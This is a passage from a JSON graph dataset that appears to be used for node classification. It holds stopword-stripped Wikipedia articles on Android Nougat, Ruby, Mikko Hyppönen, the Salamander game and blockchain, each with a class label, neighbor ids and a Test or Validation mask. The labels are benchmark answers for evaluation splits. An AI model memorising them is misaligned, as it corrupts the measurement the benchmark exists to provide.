2016 android n beta preview 2 released google discussed android n i/o keynote may 18 2016 unveiled new virtual reality platform daydream beta preview 3 first preview release deemed suitable wider public beta testing released time google also announced would hold contest determine official release name operating system beta preview 4 released june 15 2016 june 30 2016 google announced n release name would nougat also confirmed nougat would version 7.0 android final beta preview 5 released july 18 2016 android 7.0 officially released august 22 2016 nexus 6 5x 6p 9 nexus player pixel c first devices receive update dave burke android vice president engineering stated august 2016 updates nougat would released quarterly maintenance releases focusing continued refinements polish september 6 2016 lg announced v20 first smartphone ship nougat pre-installed google unveiled first-party pixel pixel xl smartphones hardware-focused event october 4 2016 pixel phones replacing nexus series updates existing devices vary manufacturer carrier driver support version manufacturer device respective system-on-chip major manufacturers including htc sony motorola announced intents update range recent devices nougat qualcomm stated would support nougat devices using snapdragon 800 801 system-on-chips undisclosed reasons although developer preview builds nougat released device sony stated would upgrade xperia z3 uses snapdragon 801 final version due unforeseen platform limitations reported google compatibility test suite whose tests must passed order receive official certification specified devices running nougat must support either vulkan opengl es 3.1 graphics apis — neither supported device adreno 330 graphics core none less fairphone 2 purported device qualcomm snapdragon 801 chipset provide official support android 7.1.2. delivering effort towards increased longevity sustainable device post-release update known android 7.1 pre-loaded onto google pixel pixel xl smartphones released october 2016 new version adds support google daydream vr platform image keyboards expanded emoji support including male female versions support actions displayed menus home screen app shortcuts new features preview 7.1 existing nexus devices released via android beta program later month officially released android 7.1.1 december 5 2016 7.1.1 nexus 6 nexus 9 considered end-of-life receive updates android 7.1.2 released april 2017 providing various improvements minor functionality improvements nexus pixel-branded devices nougat redesigns notification shade features smaller row icons settings replacing notification cards new sheet design allowing inline replies notifications multiple notifications single app also bundled greater per-app control notifications split-screen display mode introduced phones two apps snapped occupy halves screen experimental multi-window mode also available hidden feature multiple apps appear simultaneously screen overlapping windows doze power saving mechanism introduced android marshmallow expanded include state activated device running battery screen period time stationary state network activity restricted apps granted maintenance windows access network perform background tasks marshmallow full doze state activated device stationary screen period time new data saver mode restricts background mobile data usage trigger internal functions apps designed reduce bandwidth usage capping quality streaming media december 2015 google announced android nougat would switch java runtime environment defunct apache harmony openjdk—the official open source implementation java platform maintained oracle corporation java community android runtime art incorporates profile-guided compilation system utilizing jit compiler profiling alongside current ahead-of-time compiler optimize apps device hardware conditions background nougat introduces system enabling seamless automatic system updates based upon sharing code implementation similar functionality chrome os system uses pair squashfs partitions android system executes online partition updates applied background redundant offline partition next boot following installation update redundant partition designated active device henceforth boots updated system previous system partition kept backup case update failure serve offline partition next update system removes requirement device reboot system recovery environment apply update prevents device used update complete also provides ability update automatically rolled back case failure google chose enable seamless updates devices shipped nougat later rather enabling earlier devices support feature repartitioning additionally due art changes nougat apps longer need re-compiled upon first boot system update developer preview 2 added platform support vulkan new low-level 3d-rendering api alternative opengl es higher graphics performance nougat first version featuring unicode 9.0 support comes updated emoji plus support emoji skin tones android 7.1 adds native api support implementing image keyboards multi-endpoint telephony shortcut menus rounded icon assets apps launchers support google daydream virtual reality platform daydream environment includes sustained performance mode assist developers optimizing apps device thermal profile new head tracking algorithm combines input various device sensors integration system notifications vr user interface response stagefright family bugs disclosed fixed 2015 several changes made harden media stack future vulnerabilities runtime integer overflow detection implemented preventing majority stagefright-like programming bugs becoming vulnerabilities addition helping fix prevent bugs android monolithic mediaserver process redesigned better adhere principle least privilege mediaserver split several separate processes running unprivileged sandbox granted permissions required task example audioserver access bluetooth libstagefright runs within mediacodecservice sandbox granted gpu access constraints placed media stack seccomp various mechanisms enabled reduce possibility malicious code injected and/or executed inside linux kernel including dividing kernel memory logical segments code data page access permissions read-only no-execute appropriate kernel also restricted directly accessing user space memory stronger stack protection enabled gcc compiler reduce stack smashing limit exposure kernel potentially malicious code perf disabled default ioctl commands restricted selinux seccomp-bpf enabled grant processes ability restrict system calls devices shipping android nougat verified boot policy introduced partially kitkat displaying notifications startup marshmallow must strictly enforced system files corrupted otherwise modified operating system allow operation limited-use mode refuse boot dieter bohn verge praised new multitasking interface android nougat calling long overdue android tablets although initially found implementation confusing wrote worked well understood properly though noted apps ’ fully support split screen others work fine pop warning anyway bohn also liked new way reply message notification stating android long advantage useful consistent notifications versus ios added quick replies standard n't see lead diminishing also noted tweaks throughout os welcome changes including quick toggles notification drawer settings menu visual information camera app cleaned bit bohn stated n't notice significant battery improvements despite doze power-saving feature nougat also wrote extensively fact even though nougat great ’ shame take long anybody see writing lack updates android devices unless nexus could months could becomes available phone chris velazco engadget also praised new bundled app notifications writing prior android versions notifications sort sit interaction nougat much better job bundling app letting get things done highlighted ability expand bundled gmail notification see subjects senders individual messages velazco stated split-screen multitasking big deal also encountered non-compatible apps visual elements settings app quick toggles notification dropdown new language emoji support also positive highlights review velazco note battery improvement doze power-saving feature stating nexus 6p seemed gain hour two standby battery life also wrote installing launching apps might little faster usual thanks nougat new app compiler hoped game developers utilize new vulkan api seriously good-looking mobile gaming",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      8214,
      11294,
      1578,
      10284,
      5677,
      7734,
      1083,
      6212,
      69,
      8262,
      1608,
      4683,
      4685,
      11343,
      3664,
      10835,
      8280,
      8285,
      2658,
      6754,
      8821,
      6265,
      11391,
      1670,
      9863,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      9913,
      7359,
      196,
      3269,
      3782,
      8907,
      2258,
      2259,
      3795,
      10966,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      5363,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      10016,
      2852,
      4901,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      4972,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      10658,
      9637,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      2993,
      2001,
      4562,
      479,
      488,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      8698,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9245,
    "label": 9,
    "text": "Ruby_(programming_language):ruby programming language ruby interpreted high-level general-purpose programming language designed developed mid-1990s yukihiro matz matsumoto japan ruby dynamically typed uses garbage collection supports multiple programming paradigms including procedural object-oriented functional programming according creator ruby influenced perl smalltalk eiffel ada basic lisp matsumoto said ruby conceived 1993 1999 post ruby-talk mailing list describes early ideas language matsumoto describes design ruby like simple lisp language core object system like smalltalk blocks inspired higher-order functions practical utility like perl name ruby originated online chat session matsumoto keiju ishitsuka february 24 1993 code written language initially two names proposed coral ruby matsumoto chose latter later e-mail ishitsuka matsumoto later noted factor choosing name ruby – birthstone one colleagues first public release ruby 0.95 announced japanese domestic newsgroups december 21 1995 subsequently three versions ruby released two days release coincided launch japanese-language ruby-list mailing list first mailing list new language already present stage development many features familiar later releases ruby including object-oriented design classes inheritance mixins iterators closures exception handling garbage collection following release ruby 0.95 1995 several stable versions ruby released following years 1997 first article ruby published web year matsumoto hired netlab.jp work ruby full-time developer 1998 ruby application archive launched matsumoto along simple english-language homepage ruby 1999 first english language mailing list ruby-talk began signaled growing interest language outside japan year matsumoto keiju ishitsuka wrote first book ruby object-oriented scripting language ruby オブジェクト指向スクリプト言語 ruby published japan october 1999 would followed early 2000s around 20 books ruby published japanese 2000 ruby popular python japan september 2000 first english language book programming ruby printed later freely released public widening adoption ruby amongst english speakers early 2002 english-language ruby-talk mailing list receiving messages japanese-language ruby-list demonstrating ruby increasing popularity non-japanese speaking world ruby 1.8 initially released august 2003 stable long time retired june 2013 although deprecated still code based ruby 1.8 partially compatible ruby 1.9 ruby 1.8 subject several industry standards language specifications ruby developed open standards promotion center information-technology promotion agency japanese government agency submission japanese industrial standards committee jisc international organization standardization iso accepted japanese industrial standard jis x 3017 2011 international standard iso/iec 30170 2012 around 2005 interest ruby language surged tandem ruby rails web framework written ruby rails frequently credited increasing awareness ruby ruby 1.9 released christmas day 2007 effective ruby 1.9.3 released october 31 2011 ruby switched dual-licensed ruby license gpl dual-licensed ruby license two-clause bsd license adoption 1.9 slowed changes 1.8 required many popular third party gems rewritten ruby 1.9 introduces many significant changes 1.8 series examples ruby 1.9 obsolete since february 23 2015 longer receive bug security fixes users advised upgrade recent version ruby 2.0 added several new features including ruby 2.0 intended fully backward compatible ruby 1.9.3 official 2.0.0 release february 24 2013 five known minor incompatibilities obsolete since february 22 2016 longer receive bug security fixes users advised upgrade recent version ruby 2.1.0 released christmas day 2013 release includes speed-ups bugfixes library updates starting 2.1.0 ruby versioning policy like semantic versioning although similar ruby versioning policy compatible semantic versioning semantic versioning also provides additional labels pre-release build metadata available extensions major.minor.patch format available ruby ruby 2.1 obsolete since april 1 2017 longer receive bug security fixes users advised upgrade recent version ruby 2.2.0 released christmas day 2014 release includes speed-ups bugfixes library updates removes deprecated apis notably ruby 2.2.0 introduces changes memory handling incremental garbage collector support garbage collection symbols option compile directly jemalloc also contains experimental support using vfork 2 system spawn added support unicode 7.0 specification features made obsolete removed include callcc dl library digest :hmac lib/rational.rb lib/complex.rb gserver logger :application well various c api functions ruby 2.3.0 released christmas day 2015 notable changes include 2.3 branch also includes many performance improvements updates bugfixes including changes proc call socket io use exception keywords thread name handling default passive net :ftp connections rake removed stdlib ruby 2.4.0 released christmas day 2016 notable changes include 2.4 branch also includes performance improvements hash table array max array min instance variable access ruby 2.5.0 released christmas day 2017 notable changes include top come lot performance improvements like faster block passing 3 times faster faster mutexes faster erb templates improvements concatenation methods ruby 2.6.0 released christmas day 2018 notable changes include matsumoto said ruby designed programmer productivity fun following principles good user interface design google tech talk 2008 matsumoto stated hope see ruby help every programmer world productive enjoy programming happy primary purpose ruby language stresses systems design needs emphasize human rather computer needs ruby said follow principle least astonishment pola meaning language behave way minimize confusion experienced users matsumoto said primary design goal make language enjoyed using minimizing programmer work possible confusion said applied principle least astonishment design ruby nevertheless phrase come closely associated ruby programming language phrase source surprise novice users may take mean ruby behaviors try closely match behaviors familiar languages may 2005 discussion newsgroup comp.lang.ruby matsumoto attempted distance ruby pola explaining design choice surprising someone uses personal standard evaluating surprise personal standard remains consistent would surprises familiar standard matsumoto defined way interview ruby object-oriented every value object including classes instances types many languages designate primitives integers booleans null variables always hold references objects every function method methods always called object methods defined top level scope become methods object class since class ancestor every class methods called object also visible scopes effectively serving global procedures ruby supports inheritance dynamic dispatch mixins singleton methods belonging defined single instance rather defined class though ruby support multiple inheritance classes import modules mixins ruby described multi-paradigm programming language allows procedural programming defining functions/variables outside classes makes part root 'self object object orientation everything object functional programming anonymous functions closures continuations statements values functions return last evaluation support introspection reflection metaprogramming well support interpreter-based threads ruby features dynamic typing supports parametric polymorphism according ruby faq syntax similar perl semantics similar smalltalk differs greatly python syntax ruby broadly similar perl python class method definitions signaled keywords whereas code blocks defined keywords braces contrast perl variables obligatorily prefixed sigil used sigil changes semantics scope variable practical purposes distinction expressions statements line breaks significant taken end statement semicolon may equivalently used unlike python indentation significant one differences python perl ruby keeps instance variables completely private class exposes accessor methods codice_11 codice_12 etc. unlike getter setter methods languages like c++ java accessor methods ruby created single line code via metaprogramming however accessor methods also created traditional fashion c++ java invocation methods require use parentheses trivial change instance variable full function without modifying single line calling code refactoring achieving similar functionality c vb.net property members python property descriptors similar come tradeoff development process one begins python using publicly exposed instance variable later changes implementation use private instance variable exposed property descriptor code internal class may need adjusted use private variable rather public property ruby ’ design forces instance variables private also provides simple way declare codice_13 codice_14 methods keeping idea ruby one never directly accesses internal members class outside class rather one passes message class receives response see examples section samples code demonstrating ruby syntax ruby official distribution also includes codice_15 interactive command-line interpreter used test code quickly following code fragment represents sample session using codice_15 following examples run ruby shell interactive ruby shell saved file run command line typing codice_17 classic hello world example basic ruby code input conversions variety ways define strings ruby following assignments equivalent strings support variable interpolation following assignments equivalent produce raw strings constructing using array constructing using associative array ruby called hash statement two syntaxes creating code block code block passed method optional block argument many built-in methods arguments parameter-passing block closure computer science |closure creating anonymous function returning closure computer science |closures method yielding flow program control block provided calling time iterating enumerations arrays using blocks method codice_18 accept parameter block codice_18 method iterates member list performing function retaining aggregate analogous codice_20 function functional programming languages example first pass block receives 10 argument inject codice_21 1 first element array codice_22 returns 11 becomes codice_21 next pass added 3 get 14 added 5 third pass finally return 19 using enumeration block square numbers 1 10 using range invoke method item codice_24 synonym codice_25 following code defines class named codice_26 addition codice_27 usual constructor create new objects two methods one override codice_28 comparison operator codice_29 sort age override codice_30 method codice_31 format output codice_12 example metaprogramming ruby codice_33 defines getter setter methods instance variables codice_12 getter methods last evaluated statement method return value allowing omission explicit codice_35 statement preceding code prints three names reverse age order codice_26 constant reference codice_37 object ruby classes never closed methods always added existing class applies classes including standard built-in classes needed open class definition existing class new contents specified added existing contents simple example adding new method standard library codice_38 class adding methods previously defined classes often called monkey patch|monkey-patching performed recklessly practice lead behavior collisions subsequent unexpected results code scalability problems since ruby 2.0 possible use refinements reduce potentially negative consequences monkey-patching limiting scope patch particular areas code base exception raised codice_39 call optional message added exception exceptions also specified programmer alternatively exception instance passed codice_39 method last construct useful raising instance custom exception class featuring constructor takes one argument exceptions handled codice_41 clause clause catch exceptions inherit codice_42 flow control keywords used handling exceptions codice_43 codice_44 common mistake attempt catch exceptions simple rescue clause catch exceptions one must write catch particular exceptions also possible specify exception object made available handler clause alternatively recent exception stored magic global codice_45 several exceptions also caught ruby code programmatically modify run time program lifecycle phase |runtime aspects structure would fixed rigid languages class method definitions sort metaprogramming used write concise code effectively extend language example following ruby code generates new methods built-in codice_46 class based list colors methods wrap contents string html tag styled respective color generated methods could used like implement equivalent many languages programmer would write method codice_47 codice_48 codice_49 etc separately possible uses ruby metaprogramming include original ruby interpreter computer software |interpreter often referred ruby mri|matz ruby interpreter mri implementation written c uses ruby-specific virtual machine standardized retired ruby 1.8 ruby mri|implementation written c programming language |c single-pass interpreted language starting ruby 1.9 continuing ruby 2.x official ruby interpreter yarv yet another ruby vm implementation superseded slower virtual machine used previous releases mri number alternative implementations ruby including jruby rubinius mruby takes different approach jruby rubinius providing just-in-time compilation mruby also providing ahead-of-time compilation ruby three major alternate implementations ruby implementations include defunct ruby implementations maturity ruby implementations tends measured ability run ruby rails rails framework complex implement uses many ruby-specific features point particular implementation achieves goal called rails singularity reference implementation jruby rubinius able run rails unmodified production environment matsumoto originally ruby development bsd|4.3bsd -based sony news|sony news-os 3.x later migrated work sunos 4.x finally linux 1999 ruby known work across many different operating system including news-os sunos aix svr4 solaris operating system |solaris nec up-ux nextstep bsd linux classic mac os|mac os dos windows operating system |windows beos modern ruby versions implementations available many operating systems linux bsd solaris aix macos windows windows phone windows ce symbian os beos ibm rubygems ruby package manager ruby package called gem easily installed via command line gems libraries though exist applications integrated development environment|ides 10,000 ruby gems hosted rubygems.org many new existing ruby libraries hosted github service offers revision control|version control repository hosting git software |git ruby application archive hosted applications documentation libraries ruby programming maintained 2013 function transferred rubygems category ruby programming language category articles example ruby code category class-based programming languages category dynamic programming languages category dynamically typed programming languages category free software programmed c category iso standards category object-oriented programming languages category programming languages created 1995 category programming languages iso standard category scripting languages category software using bsd license category text-oriented programming languages category free compilers interpreters",
    "neighbors": [
      8201,
      6160,
      19,
      8213,
      10266,
      6176,
      50,
      8262,
      4171,
      84,
      6228,
      10340,
      102,
      4200,
      8297,
      8303,
      8304,
      2181,
      2186,
      2191,
      10387,
      148,
      155,
      2206,
      4255,
      8355,
      2217,
      10413,
      4277,
      190,
      6335,
      8385,
      6338,
      10436,
      6345,
      8408,
      6361,
      219,
      228,
      8421,
      10470,
      231,
      2281,
      8426,
      10478,
      2304,
      263,
      10506,
      10510,
      8476,
      10526,
      8479,
      8495,
      4410,
      6458,
      10555,
      321,
      10565,
      8520,
      8524,
      338,
      10581,
      10586,
      8539,
      349,
      6493,
      2401,
      4452,
      8549,
      6502,
      8554,
      6523,
      8582,
      6536,
      6555,
      10654,
      8609,
      8618,
      428,
      2481,
      4529,
      8626,
      8627,
      2485,
      10684,
      8644,
      4550,
      463,
      2519,
      477,
      479,
      482,
      6626,
      8677,
      8691,
      2548,
      502,
      2556,
      2557,
      10752,
      2576,
      10771,
      10776,
      2585,
      546,
      8738,
      8739,
      6694,
      2603,
      564,
      2617,
      574,
      6718,
      576,
      2627,
      8771,
      10819,
      8778,
      2636,
      595,
      10841,
      8799,
      4707,
      10851,
      10854,
      6797,
      10900,
      8854,
      4770,
      4775,
      4777,
      6828,
      8883,
      692,
      4802,
      711,
      8904,
      8909,
      8916,
      10964,
      4822,
      6875,
      10971,
      10973,
      741,
      2795,
      10991,
      2804,
      762,
      11017,
      788,
      2836,
      8986,
      11036,
      6941,
      8990,
      11038,
      2864,
      11056,
      820,
      823,
      4919,
      6977,
      6986,
      847,
      4943,
      4944,
      2903,
      2904,
      862,
      9063,
      7026,
      11141,
      4998,
      11161,
      929,
      7076,
      5031,
      5032,
      9128,
      963,
      5059,
      11208,
      5067,
      11219,
      11221,
      11235,
      5093,
      3051,
      7147,
      9197,
      1010,
      11256,
      11259,
      3076,
      9224,
      1034,
      9229,
      3087,
      5149,
      11303,
      5165,
      3120,
      3126,
      1079,
      9273,
      9290,
      1101,
      3159,
      7256,
      5214,
      9320,
      1130,
      7274,
      11376,
      9330,
      7292,
      7293,
      1152,
      9345,
      5255,
      7326,
      9385,
      11439,
      1203,
      7347,
      1211,
      7364,
      9455,
      11506,
      1277,
      7421,
      7430,
      5383,
      9487,
      5395,
      9491,
      11552,
      5413,
      1343,
      1347,
      1348,
      11589,
      1353,
      9557,
      11610,
      5470,
      1379,
      11625,
      9579,
      3447,
      3462,
      9614,
      1429,
      1435,
      9631,
      5546,
      11693,
      7612,
      5567,
      9666,
      9671,
      5578,
      7627,
      7629,
      5588,
      9701,
      5612,
      5614,
      7662,
      9714,
      3573,
      7695,
      1556,
      5660,
      1565,
      5677,
      7728,
      1586,
      5684,
      9780,
      1591,
      9783,
      1594,
      1610,
      9808,
      3667,
      9828,
      5743,
      9839,
      9843,
      9848,
      3705,
      5754,
      1666,
      7816,
      1673,
      9875,
      3733,
      3734,
      5783,
      3746,
      7851,
      5816,
      5819,
      7871,
      5833,
      7889,
      7894,
      5872,
      1789,
      1812,
      1813,
      5917,
      3876,
      7983,
      7987,
      5945,
      10043,
      1852,
      5961,
      10059,
      3918,
      10075,
      10083,
      8043,
      10097,
      3960,
      8057,
      1920,
      3969,
      6016,
      1931,
      1933,
      8082,
      3990,
      1960,
      1973,
      6074,
      4042,
      8147,
      4056,
      4057,
      2010,
      4058,
      4064,
      4069,
      6119,
      2029,
      10228,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 9246,
    "label": 4,
    "text": "Mikko_Hyppönen:mikko hyppönen mikko hermanni hyppönen born 1969 finland computer security expert columnist known hypponen law iot security states whenever appliance described smart vulnerable mikko hyppönen chief research officer f-secure worked f-secure finland since 1991 hyppönen assisted law enforcement united states europe asia since 1990s cybercrime cases advises governments cyber crime team took sobig.f botnet 2004 hyppönen cooperated vanity fair feature code warrior examined role defeating blaster sobig computer worms hyppönen given keynotes presentations number conferences around world including black hat def con dld rsa addition data security events hyppönen delivered talks general-interest events ted tedx dld sxsw slush google zeitgeist also spoken various military events including afcea events nato ccd coe iccc hyppönen reserve officer finnish army hyppönen member advisory board impact international multilateral partnership cyber threats since 2007 together yevgeny kaspersky hamadoun touré fred piper john thompson hyppönen columnist betanews wired also written research cnn new york times scientific american 2011 ranked 61st foreign policy top 100 global thinkers report hyppönen coined term cybercrime unicorns describe cybercrime organizations worth billion us dollars reference startup unicorns hyppönen made international news 2011 tracked visited authors first pc virus history brain hyppönen produced documentary event documentary published youtube hyppönen also documenting rise mobile phone malware since first smartphone viruses found blog news lab started hyppönen 2004 first blog antivirus company hyppönen credited twitter improving twitter security mr. hyppönen curator malware museum internet archive since 2016",
    "neighbors": [
      9537,
      2275,
      3843,
      2213,
      6344,
      2154,
      43,
      3342,
      10777,
      5971,
      9460,
      11476,
      2041,
      7899
    ],
    "mask": "None"
  },
  {
    "node_id": 9247,
    "label": 3,
    "text": "Salamander_(video_game):salamander video game retitled north america japanese arcade re-release europe known life force salamander scrolling shooter arcade game konami released 1986 spin-off gradius salamander introduced simplified power-up system two-player cooperative gameplay horizontally vertically scrolling stages later became norm future gradius games salamander followed sequel 1996 titled salamander 2 first player controls vic viper second player takes reins debuting spacecraft lord british sometimes referred road british due ambiguity japanese-to-english romanization game features six stages alter horizontal vertical scrolling players allowed continue leave upon death instead returned predefined checkpoint per gradius tradition continues single player mode two two-player mode number continues changed dip switches player gains power-ups picking capsules left behind certain enemies opposed selection bar used gradius games however japanese version life force keeps selection bar many power-ups combined example option fires second third salvo missiles ripple/plutonic lasers power-ups attained ripple laser however mutually exclusive power-up survive ship destruction options upon ship destruction options float space brief time disappearing new ship grab retain arcade version game released original title japan europe life force north america japanese european versions nearly identical american version changes game plot adding opening text establishes game set inside giant alien life-form infected strain bacteria stages feature starfield backgrounds changed web background stage 1 maintain consistency organic setting plot power-ups also given different names speed-up becoming hyper speed missile becoming destruct missile ripple laser becoming pulse laser force field becoming shield narration added beginning stage detailing area alien body player currently inhabiting enter stomach muscle zone bio-mechanical brain attack konami later released enhanced version salamander japan 1987 bearing american title life force fleshes organic motif backgrounds mechanical enemies completely redrawn given organic appearances power-up system also modified japanese life force using power-up gauge original gradius music tracks completely changed release power-up gauge arranged differently players ocean software imagine label released licensed versions salamander computer systems spectrum commodore amstrad 1988 spectrum amstrad versions generally criticized commodore 64 version highly praised critics day particularly zzap 64 though missing two six stages simultaneous two player mode gameplay much easier arcade counterpart commodore port generally considered one best arcade conversions system salamander ported family computer japan 1987 instead direct port salamander elements taken original salamander japanese life force re-release elements levels bosses removed make way new content background graphics enemy sprites salamander used favor used life force though gradius -style power bar used place original instant pick-up system year north america received port well nintendo entertainment system nes version practically identical famicom equivalent multiple endings two option power ups instead three titled life force north america version later re-released virtual console february 16 2009 wii january 23 2014 nintendo 3ds august 21 2014 wii u european version titled life force salamander cover released november 22 1989 nes version makes use konami code increases number lives three 30 first two levels life force profiled second issue nintendo power issued 1988 several issues later entire game re-profiled msx port significantly different original ports new port graphical introduction introduces human pilots ship well names stage levels notably longer arcade original player forced start pre-defined checkpoint upon death either pilot instead starting left level two player choose order next three stages addition player collect e capsules destroying certain enemies collecting fifteen permanently upgrade one available weapons power-up bar weapons allow player ships merge one player controlling movements second player controlling weapons instead vic viper lord british space destroyer ships known sabel tiger thrasher piloted human characters named iggy rock zowie scott story takes place year 6709 a.d 2 different endings msx version re-released wii virtual console japan january 12 2010 later released wii u virtual console july 20 2016 also made available project egg windows store may 19 2015 version pc engine released december 6 1991 based arcade version salamander changes port include starting pre-defined checkpoint upon death 1 player mode faster enemy animations improved music japan pc engine version re-released wii virtual console september 11 2007 playstation network july 21 2010 wii u virtual console october 22 2014 also project egg con windows store march 3 2014 released north america november 16 2017 wii u virtual console compilation titled salamander deluxe pack plus released japan sega saturn june 19 1997 playstation july 6 year compilation includes salamander japanese version life force well salamander 2 salamander released mobile phones 2003 three arcade versions salamander american japanese adaptations life force ported arcade archives november 27 2015 japan exclusively playstation 4 later released worldwide spring 2016 published hamster corporation another compilation salamander series titled salamander portable released playstation portable january 24 2007 japan psp compilation features three games previously included salamander deluxe pack plus well xexex msx version gradius 2 a.k.a nemesis ii unrelated arcade game december 20 2010 application called pc engine game box published app store served portal download classic pc engine video games among downloadable titles pc engine version salamander fee arcade version included konami arcade classics anniversary collection released april 2019 digital-only format playstation 4 xbox one nintendo switch pc initially compilation japan salamander version game everywhere else featured american life force instead june 2019 konami added free japanese versions respective games western arcade classics anniversary collection salamander version played addition japanese life force part compilation conversely american version life force added collection japan update 1988 ova mini-series studio pierrot directed hisayuki toriumi three episodes released vhs laserdisc february 25 1988 february 21 1989 series licensed british company western connection series canon however msx gradius series states events gofer take place two-hundred year period following crisis zelos salamander armada mini-series revealed bacterians capture sentient life create leaders space armada capture sentient life via dark fog going space changes inorganic matter organic matter large brain-like final bosses games crystal-like life-form origin noriko hidaka provided voice protagonist stephanie anime lord british space destroyer named one protagonists ike lord british planet latis thus making lord british space destroyer",
    "neighbors": [
      2498,
      9063,
      8937,
      9005,
      9006,
      10931,
      4405,
      11477
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9248,
    "label": 1,
    "text": "Blockchain:blockchain blockchain originally block chain growing list records called blocks linked using cryptography block contains cryptographic hash previous block timestamp transaction data generally represented merkle tree design blockchain resistant modification data open distributed ledger record transactions two parties efficiently verifiable permanent way use distributed ledger blockchain typically managed peer-to-peer network collectively adhering protocol inter-node communication validating new blocks recorded data given block altered retroactively without alteration subsequent blocks requires consensus network majority although blockchain records unalterable blockchains may considered secure design exemplify distributed computing system high byzantine fault tolerance decentralized consensus therefore claimed blockchain blockchain invented person group people using name satoshi nakamoto 2008 serve public transaction ledger cryptocurrency bitcoin identity satoshi nakamoto unknown invention blockchain bitcoin made first digital currency solve double-spending problem without need trusted authority central server bitcoin design inspired applications blockchains readable public widely used cryptocurrencies blockchain considered type payment rail private blockchains proposed business use sources computerworld called marketing blockchains without proper security model snake oil first work cryptographically secured chain blocks described 1991 stuart haber w. scott stornetta wanted implement system document timestamps could tampered 1992 bayer haber stornetta incorporated merkle trees design improved efficiency allowing several document certificates collected one block first blockchain conceptualized person group people known satoshi nakamoto 2008 nakamoto improved design important way using hashcash-like method add blocks chain without requiring signed trusted party design implemented following year nakamoto core component cryptocurrency bitcoin serves public ledger transactions network august 2014 bitcoin blockchain file size containing records transactions occurred network reached 20 gb gigabytes january 2015 size grown almost 30 gb january 2016 january 2017 bitcoin blockchain grew 50 gb 100 gb size words block chain used separately satoshi nakamoto original paper eventually popularized single word blockchain 2016 smart contracts run blockchain example ones creat e invoices pay shipment arrives share certificates automatically send owners dividends profits reach certain level require off-chain oracle access external data events based time market conditions need interact blockchain according accenture application diffusion innovations theory suggests blockchains attained 13.5 adoption rate within financial services 2016 therefore reaching early adopters phase industry trade groups joined create global blockchain forum 2016 initiative chamber digital commerce may 2018 gartner found 1 cios indicated kind blockchain adoption within organisations 8 cios short-term 'planning looking active experimentation blockchain blockchain decentralized distributed public digital ledger used record transactions across many computers involved record altered retroactively without alteration subsequent blocks allows participants verify audit transactions independently relatively inexpensively blockchain database managed autonomously using peer-to-peer network distributed timestamping server authenticated mass collaboration powered collective self-interests design facilitates robust workflow participants uncertainty regarding data security marginal use blockchain removes characteristic infinite reproducibility digital asset confirms unit value transferred solving long-standing problem double spending blockchain described value-exchange protocol blockchain maintain title rights properly set detail exchange agreement provides record compels offer acceptance blocks hold batches valid transactions hashed encoded merkle tree block includes cryptographic hash prior block blockchain linking two linked blocks form chain iterative process confirms integrity previous block way back original genesis block sometimes separate blocks produced concurrently creating temporary fork addition secure hash-based history blockchain specified algorithm scoring different versions history one higher score selected others blocks selected inclusion chain called orphan blocks peers supporting database different versions history time time keep highest-scoring version database known whenever peer receives higher-scoring version usually old version single new block added extend overwrite database retransmit improvement peers never absolute guarantee particular entry remain best version history forever blockchains typically built add score new blocks onto old blocks given incentives extend new blocks rather overwrite old blocks therefore probability entry becoming superseded decreases exponentially blocks built top eventually becoming low example bitcoin uses proof-of-work system chain cumulative proof-of-work considered valid one network number methods used demonstrate sufficient level computation within blockchain computation carried redundantly rather traditional segregated parallel manner block time average time takes network generate one extra block blockchain blockchains create new block frequently every five seconds time block completion included data becomes verifiable cryptocurrency practically transaction takes place shorter block time means faster transactions block time ethereum set 14 15 seconds bitcoin 10 minutes storing data across peer-to-peer network blockchain eliminates number risks come data held centrally decentralized blockchain may use ad-hoc message passing distributed networking peer-to-peer blockchain networks lack centralized points vulnerability computer crackers exploit likewise central point failure blockchain security methods include use public-key cryptography public key long random-looking string numbers address blockchain value tokens sent across network recorded belonging address private key like password gives owner access digital assets means otherwise interact various capabilities blockchains support data stored blockchain generally considered incorruptible every node decentralized system copy blockchain data quality maintained massive database replication computational trust centralized official copy exists user trusted transactions broadcast network using software messages delivered best-effort basis mining nodes validate transactions add block building broadcast completed block nodes blockchains use various time-stamping schemes proof-of-work serialize changes alternative consensus methods include proof-of-stake growth decentralized blockchain accompanied risk centralization computer resources required process larger amounts data become expensive open blockchains user-friendly traditional ownership records open public still require physical access view early blockchains permissionless controversy arisen blockchain definition issue ongoing debate whether private system verifiers tasked authorized permissioned central authority considered blockchain proponents permissioned private chains argue term blockchain may applied data structure batches data time-stamped blocks blockchains serve distributed version multiversion concurrency control mvcc databases mvcc prevents two transactions concurrently modifying single object database blockchains prevent two transactions spending single output blockchain opponents say permissioned systems resemble traditional corporate databases supporting decentralized data verification systems hardened operator tampering revision nikolai hampton computerworld said many in-house blockchain solutions nothing cumbersome databases without clear security model proprietary blockchains eyed suspicion great advantage open permissionless public blockchain network guarding bad actors required access control needed means applications added network without approval trust others using blockchain transport layer bitcoin cryptocurrencies currently secure blockchain requiring new entries include proof work prolong blockchain bitcoin uses hashcash puzzles hashcash designed 1997 adam back original idea first proposed cynthia dwork moni naor eli ponyatovski 1992 paper pricing via processing combatting junk mail financial companies prioritised decentralized blockchains 2016 venture capital investment blockchain-related projects weakening usa increasing china bitcoin many cryptocurrencies use open public blockchains bitcoin highest market capitalization permissioned blockchains use access control layer govern access network contrast public blockchain networks validators private blockchain networks vetted network owner rely anonymous nodes validate transactions benefit network effect permissioned blockchains also go name 'consortium blockchains nikolai hampton pointed computerworld also need '51 percent attack private blockchain private blockchain likely already controls 100 percent block creation resources could attack damage blockchain creation tools private corporate server could effectively control 100 percent network alter transactions however wished set particularly profound adverse implications financial crisis debt crisis like financial crisis 2007–08 politically powerful actors may make decisions favor groups expense others bitcoin blockchain protected massive group mining effort unlikely private blockchain try protect records using 